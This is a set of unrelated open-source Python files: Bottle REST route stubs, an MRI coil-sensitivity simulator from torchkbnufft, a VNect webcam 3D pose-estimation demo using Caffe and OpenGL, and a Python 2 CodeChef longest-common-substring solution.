def widget_put(mongodb, slug=None):
return put(mongodb, collection, slug)
@widget_app.route('/<slug>', method='DELETE')
def widget_delete(mongodb, slug=None):
return delete(mongodb, collection, slug)
|
notebooks/mrisensesim.py | ckolbPTB/torchkbnufft | 122 | 12691891 | import numpy as np
def mrisensesim(size, ncoils=8, array_cent=None, coil_width=2, n_rings=None, phi=0):
"""Apply simulated sensitivity maps. Based on a script by <NAME>.
Args:
size (tuple): Size of the image array for the sensitivity coils.
        ncoils (int, default: 8): Number of coils to simulate.
        array_cent (tuple, default: None): Location of the center of the coil
            array (only used when ncoils == 1).
coil_width (double, default: 2): Parameter governing the width of the
coil, multiplied by actual image dimension.
n_rings (int, default: ncoils // 4): Number of rings for a
cylindrical hardware set-up.
phi (double, default: 0): Parameter for rotating coil geometry.
Returns:
list: A list of dimensions (ncoils, (N)), specifying spatially-varying
sensitivity maps for each coil.
"""
if array_cent is None:
c_shift = [0, 0, 0]
elif len(array_cent) < 3:
c_shift = array_cent + (0,)
else:
c_shift = array_cent
c_width = coil_width * min(size)
if len(size) > 2:
if n_rings is None:
n_rings = ncoils // 4
    c_rad = min(size[0:2]) / 2  # coil ring radius from the smaller in-plane dimension
smap = []
if len(size) > 2:
zz, yy, xx = np.meshgrid(
range(size[2]), range(size[1]), range(size[0]), indexing="ij"
)
else:
yy, xx = np.meshgrid(range(size[1]), range(size[0]), indexing="ij")
if ncoils > 1:
x0 = np.zeros((ncoils,))
y0 = np.zeros((ncoils,))
z0 = np.zeros((ncoils,))
for i in range(ncoils):
if len(size) > 2:
theta = np.radians((i - 1) * 360 / (ncoils + n_rings) + phi)
else:
theta = np.radians((i - 1) * 360 / ncoils + phi)
x0[i] = c_rad * np.cos(theta) + size[0] / 2
y0[i] = c_rad * np.sin(theta) + size[1] / 2
if len(size) > 2:
z0[i] = (size[2] / (n_rings + 1)) * (i // n_rings)
smap.append(
np.exp(
-1
* ((xx - x0[i]) ** 2 + (yy - y0[i]) ** 2 + (zz - z0[i]) ** 2)
/ (2 * c_width)
)
)
else:
smap.append(
np.exp(-1 * ((xx - x0[i]) ** 2 + (yy - y0[i]) ** 2) / (2 * c_width))
)
else:
x0 = c_shift[0]
y0 = c_shift[1]
z0 = c_shift[2]
if len(size) > 2:
smap = np.exp(
-1 * ((xx - x0) ** 2 + (yy - y0) ** 2 + (zz - z0) ** 2) / (2 * c_width)
)
else:
smap = np.exp(-1 * ((xx - x0) ** 2 + (yy - y0) ** 2) / (2 * c_width))
side_mat = np.arange(int(size[0] // 2) - 20, 1, -1)
side_mat = np.reshape(side_mat, (1,) + side_mat.shape) * np.ones(shape=(size[1], 1))
cent_zeros = np.zeros(shape=(size[1], size[0] - side_mat.shape[1] * 2))
ph = np.concatenate((side_mat, cent_zeros, side_mat), axis=1) / 10
if len(size) > 2:
ph = np.reshape(ph, (1,) + ph.shape)
for i, s in enumerate(smap):
smap[i] = s * np.exp(i * 1j * ph * np.pi / 180)
return smap
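

# Illustrative sketch only (not part of the original module): simulate an
# 8-coil array for a 64x64 image and stack the per-coil maps into one array.
if __name__ == "__main__":
    maps = mrisensesim(size=(64, 64), ncoils=8, coil_width=2)
    maps = np.stack(maps)          # -> (ncoils, ny, nx), complex-valued
    print(maps.shape, maps.dtype)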
|
demo_gl.py | wangqr/VNect-tensorflow | 489 | 12691914 | <filename>demo_gl.py
import caffe
import argparse
import os
import cv2
import numpy as np
import time
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import pygame
from pygame.locals import *
from OpenGL.GL import *
from OpenGL.GLU import *
import utils
parser = argparse.ArgumentParser()
parser.add_argument('--device', default='gpu')
parser.add_argument('--model_dir', default='/media/tim_ho/HDD1/Projects/VNect-tensorflow/models')
parser.add_argument('--input_size', type=int, default=368)
parser.add_argument('--num_of_joints', type=int, default=21)
parser.add_argument('--pool_scale', type=int, default=8)
parser.add_argument('--plot_2d', action='store_true')
parser.add_argument('--plot_3d', action='store_true')
args = parser.parse_args()
joint_color_code = [[139, 53, 255],
[0, 56, 255],
[43, 140, 237],
[37, 168, 36],
[147, 147, 0],
[70, 17, 145]]
# Limb parents of each joint
limb_parents = [1, 15, 1, 2, 3, 1, 5, 6, 14, 8, 9, 14, 11, 12, 14, 14, 1, 4, 7, 10, 13]
# input scales
scales = [1.0, 0.7]
def demo():
joints_2d = np.zeros(shape=(args.num_of_joints, 2), dtype=np.int32)
joints_3d = np.zeros(shape=(args.num_of_joints, 3), dtype=np.float32)
if args.plot_3d:
plt.ion()
fig = plt.figure()
ax = fig.add_subplot(121, projection='3d')
ax2 = fig.add_subplot(122)
plt.show()
if args.device == 'cpu':
caffe.set_mode_cpu()
elif args.device == 'gpu':
caffe.set_mode_gpu()
caffe.set_device(0)
else:
raise ValueError('No such device')
model_prototxt_path = os.path.join(args.model_dir, 'vnect_net.prototxt')
model_weight_path = os.path.join(args.model_dir, 'vnect_model.caffemodel')
# Load model
model = caffe.Net(model_prototxt_path,
model_weight_path,
caffe.TEST)
# Show network structure and shape
for layer_name in model.params.keys():
print(layer_name, model.params[layer_name][0].data.shape)
print('')
for i in model.blobs.keys():
print(i, model.blobs[i].data.shape)
cam = cv2.VideoCapture(0)
is_tracking = False
# for img_name in os.listdir('test_imgs'):
while True:
# if not is_tracking:
img_path = 'test_imgs/{}'.format('dance.jpg')
t1 = time.time()
input_batch = []
cam_img = utils.read_square_image('', cam, args.input_size, 'WEBCAM')
# cam_img = utils.read_square_image(img_path, '', args.input_size, 'IMAGE')
# cv2.imshow('', cam_img)
# cv2.waitKey(0)
orig_size_input = cam_img.astype(np.float32)
for scale in scales:
resized_img = utils.resize_pad_img(orig_size_input, scale, args.input_size)
input_batch.append(resized_img)
input_batch = np.asarray(input_batch, dtype=np.float32)
input_batch = np.transpose(input_batch, (0, 3, 1, 2))
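        # Normalize: scale pixels to [0, 1], then subtract a fixed 0.4 offset before feeding the network.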
input_batch /= 255.0
input_batch -= 0.4
model.blobs['data'].data[...] = input_batch
# Forward
model.forward()
# Get output data
x_hm = model.blobs['x_heatmap'].data
y_hm = model.blobs['y_heatmap'].data
z_hm = model.blobs['z_heatmap'].data
hm = model.blobs['heatmap'].data
# Trans coordinates
x_hm = x_hm.transpose([0, 2, 3, 1])
y_hm = y_hm.transpose([0, 2, 3, 1])
z_hm = z_hm.transpose([0, 2, 3, 1])
hm = hm.transpose([0, 2, 3, 1])
# Average scale outputs
hm_size = args.input_size // args.pool_scale
hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
x_hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
y_hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
z_hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
for i in range(len(scales)):
rescale = 1.0 / scales[i]
scaled_hm = cv2.resize(hm[i, :, :, :], (0, 0), fx=rescale, fy=rescale, interpolation=cv2.INTER_LINEAR)
scaled_x_hm = cv2.resize(x_hm[i, :, :, :], (0, 0), fx=rescale, fy=rescale, interpolation=cv2.INTER_LINEAR)
scaled_y_hm = cv2.resize(y_hm[i, :, :, :], (0, 0), fx=rescale, fy=rescale, interpolation=cv2.INTER_LINEAR)
scaled_z_hm = cv2.resize(z_hm[i, :, :, :], (0, 0), fx=rescale, fy=rescale, interpolation=cv2.INTER_LINEAR)
mid = [scaled_hm.shape[0] // 2, scaled_hm.shape[1] // 2]
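            # Center-crop each rescaled heatmap back to the base (hm_size x hm_size) grid so all scales align before averaging.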
hm_avg += scaled_hm[mid[0] - hm_size // 2: mid[0] + hm_size // 2,
mid[1] - hm_size // 2: mid[1] + hm_size // 2, :]
x_hm_avg += scaled_x_hm[mid[0] - hm_size // 2: mid[0] + hm_size // 2,
mid[1] - hm_size // 2: mid[1] + hm_size // 2, :]
y_hm_avg += scaled_y_hm[mid[0] - hm_size // 2: mid[0] + hm_size // 2,
mid[1] - hm_size // 2: mid[1] + hm_size // 2, :]
z_hm_avg += scaled_z_hm[mid[0] - hm_size // 2: mid[0] + hm_size // 2,
mid[1] - hm_size // 2: mid[1] + hm_size // 2, :]
hm_avg /= len(scales)
x_hm_avg /= len(scales)
y_hm_avg /= len(scales)
z_hm_avg /= len(scales)
t2 = time.time()
# Get 2d joints
joints_2d = utils.extract_2d_joint_from_heatmap(hm_avg, args.input_size, joints_2d)
# Get 3d joints
joints_3d = utils.extract_3d_joints_from_heatmap(joints_2d, x_hm_avg, y_hm_avg, z_hm_avg, args.input_size,
joints_3d)
print('Post FPS', 1/(time.time()-t2))
# Plot 2d location heatmap
joint_map = np.zeros(shape=(args.input_size, args.input_size, 3))
for joint_num in range(joints_2d.shape[0]):
cv2.circle(joint_map, center=(joints_2d[joint_num][1], joints_2d[joint_num][0]), radius=3,
color=(255, 0, 0), thickness=-1)
# Plot 2d limbs
limb_img = utils.draw_limbs_2d(cam_img, joints_2d, limb_parents)
# Plot 3d limbs
if args.plot_3d:
ax.clear()
ax.view_init(azim=0, elev=90)
ax.set_xlim(-700, 700)
ax.set_ylim(-800, 800)
ax.set_zlim(-700, 700)
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.set_zlabel('z')
utils.draw_limbs_3d(joints_3d, limb_parents, ax)
# draw heatmap
# hm_img = utils.draw_predicted_heatmap(hm_avg*200, args.input_size)
# cv2.imshow('hm', hm_img.astype(np.uint8))
# cv2.waitKey(0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
utils.draw_limb_3d_gl(joints_3d, limb_parents)
pygame.display.flip()
pygame.time.wait(1)
concat_img = np.concatenate((limb_img, joint_map), axis=1)
# ax2.imshow(concat_img[..., ::-1].astype(np.uint8))
cv2.imshow('2d', concat_img.astype(np.uint8))
cv2.waitKey(1)
# ax2.imshow(concat_img.astype(np.uint8))
# plt.pause(0.0001)
# plt.show(block=False)
print('Forward FPS', 1 / (time.time() - t1))
if __name__ == '__main__':
pygame.init()
display = (800, 600)
pygame.display.set_mode(display, DOUBLEBUF | OPENGL)
gluPerspective(70, (display[0] / display[1]), 0.1, 200.0)
view_range = 800
# glOrtho(-view_range, view_range,
# -view_range, view_range,
# -view_range, view_range)
glTranslatef(0.0, 0.0, 100)
demo()
|
CodeChef/SHORT/COOK63/Problem A/A.py | VastoLorde95/Competitive-Programming | 170 | 12691932 | <gh_stars>100-1000
from math import *
from fractions import *
def solve():
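    # Brute force: enumerate every substring of the first word with length >= 2,
    # keep those occurring in all the words, then print the longest such substring
    # (lexicographically smallest on ties), or an empty line if none exists.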
n = input()
w = raw_input().split()
l = len(w[0])
lis = []
for i in xrange(l):
for j in xrange(i+1,l):
t = w[0][i:j+1]
ok = True
for st in w:
# print t, st
if t not in st:
ok = False
break
if ok:
lis.append(t)
tmp = []
mx = 0
for st in lis:
if len(st) > mx:
mx =len(st)
for st in lis:
if len(st) == mx:
tmp.append(st)
if mx == 0:
print
else:
tmp.sort()
print tmp[0]
return
for _ in xrange(input()):
solve()
|